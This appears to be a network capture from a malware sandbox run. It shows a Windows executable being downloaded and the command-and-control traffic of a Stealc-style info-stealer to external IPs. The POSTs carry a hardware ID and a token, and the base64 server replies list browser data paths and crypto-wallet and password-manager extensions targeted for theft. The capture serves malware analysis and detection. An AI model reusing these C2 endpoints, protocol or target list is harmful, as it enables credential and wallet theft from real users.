00 00 50 45 00 00 4c 01 04 00 98 e0 c8 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 c8 01 00 00 42 22 00 00 00 00 00 90 64 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 24 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$bu^uku_{vfz{fuZuhRichPELfB"d@0$@<#$.textJ .rdata@@.data+!@.reloc*D#F@B
Sep 3, 2024 17:13:14.714951038 CEST	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 79 b9 41 00 70 c8 41 00 d9 c8 41 00 00 00 00 Data Ascii: yApAAUQEE}tMUUEEE]UEExMUMMM]UQSjh
Sep 3, 2024 17:13:14.714962006 CEST	1236	IN	Data Raw: 30 00 00 68 c0 41 c8 17 6a 00 ff 15 24 d0 62 00 89 45 fc 50 83 f8 11 74 05 8b c0 fc 85 c9 0b c0 f8 58 83 7d fc 00 74 2c 90 8a c0 68 c0 9e e6 05 8b 45 fc 50 e8 4e 73 01 00 53 8a c9 8a c9 fc 5b 68 00 80 00 00 68 c0 41 c8 17 8b 4d fc 51 ff 15 64 cf Data Ascii: 0hAj$bEPtX}t,hEPNsS[hhAMQdb[]UQEjj@h0hjbPbE}ujbR]U(EPtbMM}sjb]U@bPa
Sep 3, 2024 17:13:14.714972019 CEST	104	IN	Data Raw: 30 e8 4d 8c 01 00 8b 4d fc e8 e5 00 00 00 8b e5 5d c3 cc 55 8b ec 51 89 4d fc 8b 45 08 50 8b 4d fc e8 0d 01 00 00 8b 4d 08 83 c1 30 51 8b 4d fc 83 c1 30 e8 bb 8b 01 00 8b 55 08 83 c2 3c 52 8b 4d fc 83 c1 3c e8 a9 8b 01 00 8b 45 08 83 c0 48 50 8b Data Ascii: 0MM]UQMEPMM0QM0U<RM<EHPMHMUBTAT
Sep 3, 2024 17:13:14.715085030 CEST	1236	IN	Data Raw: 8b 4d fc 8b 55 08 8b 42 58 89 41 58 8b 4d fc 8b 55 08 8b 42 5c 89 41 5c 8b 4d fc 8b 55 08 8b 42 60 89 41 60 8b 4d fc 8b 55 08 8b 42 64 89 41 64 8b 4d fc 8b 55 08 8b 42 68 89 41 68 8b 4d fc 8b 55 08 8b 42 6c 89 41 6c 8b 4d fc 8b 55 08 8b 42 70 89 Data Ascii: MUBXAXMUB\A\MUB`A`MUBdAdMUBhAhMUBlAlMUBpApMUBtAtMUBxAxM\|QM\|E]UQMM$NMCM8M0]UQMEPMMQMU
Sep 3, 2024 17:13:14.715095043 CEST	224	IN	Data Raw: 13 87 01 00 8d 8d a8 fd ff ff e8 08 87 01 00 8d 8d b4 fd ff ff e8 fd 86 01 00 e9 a6 00 00 00 8d 95 cc fe ff ff 52 8d 85 30 fd ff ff 50 68 54 55 42 00 8d 8d 3c fd ff ff 51 8d 55 08 52 8d 85 48 fd ff ff 50 68 ac 54 42 00 8d 8d 54 fd ff ff 51 8d 55 Data Ascii: R0PhTUB<QURHPhTBTQUR`PZLEP)0~<sHhT]`RRl
Sep 3, 2024 17:13:14.715198994 CEST	1236	IN	Data Raw: 0f 84 ab 02 00 00 68 0a 0e 42 00 8d 8d 80 fe ff ff e8 61 85 01 00 68 a4 56 42 00 8d 85 fc fc ff ff 50 8d 4d 18 51 8d 95 08 fd ff ff 52 68 fc 55 42 00 8d 85 14 fd ff ff 50 8b 0d f0 c9 62 00 51 8d 95 20 fd ff ff 52 8d 8d 80 fe ff ff e8 95 87 01 00 Data Ascii: hBahVBPMQRhUBPbQ RPd }0t0PQ)Pb}0tMU$RPhLWBQ
Sep 3, 2024 17:13:14.715209007 CEST	104	IN	Data Raw: 4d 08 8b 51 04 2b 55 0c c1 e2 0c 03 55 f8 89 55 f8 8b 45 f8 89 45 fc 8b 4d 08 8b 51 04 2b 55 0c 8b 45 08 89 50 04 8b 4d fc 8b 55 0c 89 51 04 8b 45 fc 8b 4d 08 89 48 0c 8b 55 fc 8b 45 08 8b 48 08 89 4a 08 8b 55 08 83 7a 08 00 74 0c 8b 45 08 8b 48 Data Ascii: MQ+UUUEEMQ+UEPMUQEMHUEHJUztEHUQEMHUE
Sep 3, 2024 17:13:14.715328932 CEST	1236	IN	Data Raw: 8b 08 89 0a 8b 45 fc 8b e5 5d c3 55 8b ec a1 90 d1 62 00 3b 45 0c 75 09 8b 4d 08 89 0d 90 d1 62 00 8b 55 08 8b 42 04 8b 4d 0c 03 41 04 8b 55 08 89 42 04 8b 45 08 8b 4d 0c 8b 51 08 89 50 08 8b 45 0c 83 78 08 00 74 0c 8b 4d 0c 8b 51 08 8b 45 08 89 Data Ascii: E]Ub;EuMbUBMAUBEMQPExtMQEBE]UE]UE]U=buh hB2EPEMQbR]E}uEPbQAE}u3TU
Sep 3, 2024 17:13:14.715379000 CEST	1236	IN	Data Raw: 00 6a 09 68 84 1e 42 00 68 90 1e 42 00 e8 55 20 00 00 83 c4 0c a3 28 cb 62 00 6a 0c 68 9c 1e 42 00 68 ac 1e 42 00 e8 3c 20 00 00 83 c4 0c a3 ac cc 62 00 6a 09 68 bc 1e 42 00 68 c8 1e 42 00 e8 23 20 00 00 83 c4 0c a3 24 cc 62 00 6a 0d 68 d4 1e 42 Data Ascii: jhBhBU (bjhBhB< bjhBhB# $bjhBhB bjhBhBbjhBh$B(bjh<BhDBbjhLBh\BPbjhlBhtB@bjh\|BhBt
Sep 3, 2024 17:13:14.715389967 CEST	328	IN	Data Raw: 00 68 90 23 42 00 e8 88 1b 00 00 83 c4 0c a3 4c ca 62 00 6a 17 68 9c 23 42 00 68 b4 23 42 00 e8 6f 1b 00 00 83 c4 0c a3 1c cd 62 00 6a 0a 68 cc 23 42 00 68 d8 23 42 00 e8 56 1b 00 00 83 c4 0c a3 8c c9 62 00 6a 0d 68 e4 23 42 00 68 f4 23 42 00 e8 Data Ascii: h#BLbjh#Bh#Bobjh#Bh#BVbjh#Bh#B=bjh$Bh$B$(bjh$Bh,$BLbjh<$BhH$BbjhT$Bh`$BLbjhl$Bh\|$Bhbjh$Bh$B\b

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49725	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:14.680092096 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:13:15.514307976 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:13:15.525500059 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:13:15.788800001 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49726	185.215.113.17	80	6012	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:15.799118042 CEST	89	OUT	GET / HTTP/1.1 Host: 185.215.113.17 Connection: Keep-Alive Cache-Control: no-cache
Sep 3, 2024 17:13:16.643819094 CEST	203	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:16 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 3, 2024 17:13:16.648137093 CEST	415	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDHIEHJEBAAFIDHJEBGI Host: 185.215.113.17 Content-Length: 214 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 45 48 4a 45 42 41 41 46 49 44 48 4a 45 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 35 38 33 35 42 36 46 32 35 37 34 35 32 35 33 37 30 33 36 34 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 45 48 4a 45 42 41 41 46 49 44 48 4a 45 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 32 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 45 48 4a 45 42 41 41 46 49 44 48 4a 45 42 47 49 2d 2d 0d 0a Data Ascii: ------GDHIEHJEBAAFIDHJEBGIContent-Disposition: form-data; name="hwid"75835B6F2574525370364------GDHIEHJEBAAFIDHJEBGIContent-Disposition: form-data; name="build"default2------GDHIEHJEBAAFIDHJEBGI--
Sep 3, 2024 17:13:17.551237106 CEST	407	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:16 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 5a 54 63 32 4d 47 59 31 5a 47 4a 6b 4e 32 45 35 4d 6a 68 6c 4e 47 4d 77 4f 47 51 35 4d 47 52 68 5a 44 6c 6d 4e 6a 49 79 4f 44 56 6d 4d 6d 52 6a 4d 7a 4d 35 4e 7a 5a 6d 4d 44 46 6d 4e 7a 67 77 59 57 4d 32 4e 7a 59 78 59 57 4d 34 59 54 4d 31 4f 54 67 30 4f 57 51 33 5a 44 51 79 4e 47 52 68 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: ZTc2MGY1ZGJkN2E5MjhlNGMwOGQ5MGRhZDlmNjIyODVmMmRjMzM5NzZmMDFmNzgwYWM2NzYxYWM4YTM1OTg0OWQ3ZDQyNGRhfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Sep 3, 2024 17:13:17.553062916 CEST	469	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFHDHIJDGCBAKFIEGHCB Host: 185.215.113.17 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 37 36 30 66 35 64 62 64 37 61 39 32 38 65 34 63 30 38 64 39 30 64 61 64 39 66 36 32 32 38 35 66 32 64 63 33 33 39 37 36 66 30 31 66 37 38 30 61 63 36 37 36 31 61 63 38 61 33 35 39 38 34 39 64 37 64 34 32 34 64 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 2d 2d 0d 0a Data Ascii: ------CFHDHIJDGCBAKFIEGHCBContent-Disposition: form-data; name="token"e760f5dbd7a928e4c08d90dad9f62285f2dc33976f01f780ac6761ac8a359849d7d424da------CFHDHIJDGCBAKFIEGHCBContent-Disposition: form-data; name="message"browsers------CFHDHIJDGCBAKFIEGHCB--
Sep 3, 2024 17:13:17.819062948 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:17 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Sep 3, 2024 17:13:17.819082022 CEST	512	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
Sep 3, 2024 17:13:17.823200941 CEST	468	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIJEGIIJDGHDGCBGHCAA Host: 185.215.113.17 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 49 49 4a 44 47 48 44 47 43 42 47 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 37 36 30 66 35 64 62 64 37 61 39 32 38 65 34 63 30 38 64 39 30 64 61 64 39 66 36 32 32 38 35 66 32 64 63 33 33 39 37 36 66 30 31 66 37 38 30 61 63 36 37 36 31 61 63 38 61 33 35 39 38 34 39 64 37 64 34 32 34 64 61 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 49 49 4a 44 47 48 44 47 43 42 47 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 49 49 4a 44 47 48 44 47 43 42 47 48 43 41 41 2d 2d 0d 0a Data Ascii: ------HIJEGIIJDGHDGCBGHCAAContent-Disposition: form-data; name="token"e760f5dbd7a928e4c08d90dad9f62285f2dc33976f01f780ac6761ac8a359849d7d424da------HIJEGIIJDGHDGCBGHCAAContent-Disposition: form-data; name="message"plugins------HIJEGIIJDGHDGCBGHCAA--
Sep 3, 2024 17:13:18.083559990 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:17 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Sep 3, 2024 17:13:18.083614111 CEST	164	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9n
Sep 3, 2024 17:13:18.083626032 CEST	1236	IN	Data Raw: 61 32 64 6a 5a 47 5a 6f 61 47 4a 6b 5a 47 4e 6e 61 47 46 6a 61 47 74 6c 61 6d 56 68 63 48 77 78 66 44 42 38 4d 48 78 54 62 32 78 73 5a 58 52 38 5a 6d 68 74 5a 6d 56 75 5a 47 64 6b 62 32 4e 74 59 32 4a 74 5a 6d 6c 72 5a 47 4e 76 5a 32 39 6d 63 47 Data Ascii: a2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkbWthYWtlam5oYWV8MXwwfDB8UG9seW1lc2ggV2FsbGV0fGpvamhmZW9lZGtwa2dsYmZpbWRmYWJwZGZ
Sep 3, 2024 17:13:18.083744049 CEST	1236	IN	Data Raw: 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46 64 68 62 47 78 6c 64 48 78 6b 61 32 52 6c 5a 47 78 77 5a 32 52 74 62 57 74 72 5a 6d 70 68 59 6d 5a 6d 5a 57 64 68 62 6d Data Ascii: ZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8MHwwfFRlbXBsZXxvb2tqbGJraWl
Sep 3, 2024 17:13:18.083767891 CEST	448	IN	Data Raw: 63 79 42 58 59 57 78 73 5a 58 52 38 5a 57 5a 69 5a 32 78 6e 62 32 5a 76 61 58 42 77 59 6d 64 6a 61 6d 56 77 62 6d 68 70 59 6d 78 68 61 57 4a 6a 62 6d 4e 73 5a 32 74 38 4d 58 77 77 66 44 42 38 52 6d 6c 75 62 6d 6c 6c 66 47 4e 71 62 57 74 75 5a 47 Data Ascii: cyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmt
Sep 3, 2024 17:13:18.083781004 CEST	1236	IN	Data Raw: 5a 48 42 75 62 57 52 69 59 32 68 76 62 6d 6c 6c 62 47 6c 6b 5a 32 39 69 5a 47 52 6d 5a 6d 5a 73 59 57 78 38 4d 58 77 77 66 44 42 38 52 30 46 31 64 47 67 67 51 58 56 30 61 47 56 75 64 47 6c 6a 59 58 52 76 63 6e 78 70 62 47 64 6a 62 6d 68 6c 62 48 Data Ascii: ZHBubWRiY2hvbmllbGlkZ29iZGRmZmZsYWx8MXwwfDB8R0F1dGggQXV0aGVudGljYXRvcnxpbGdjbmhlbHBjaG5jZWVpcGlwaWphbGprYmxiY29ibHwxfDB8MHxCaXR3YXJkZW58bm5nY2Vja2JhcGViZmltbmxuaWlpYWhrYW5kY2xibGJ8MXwwfDB8S2VlUGFzc1hDfG9ib29uYWtlbW9mcGFsY2dnaG9jZm9hZG9maWRqa2t
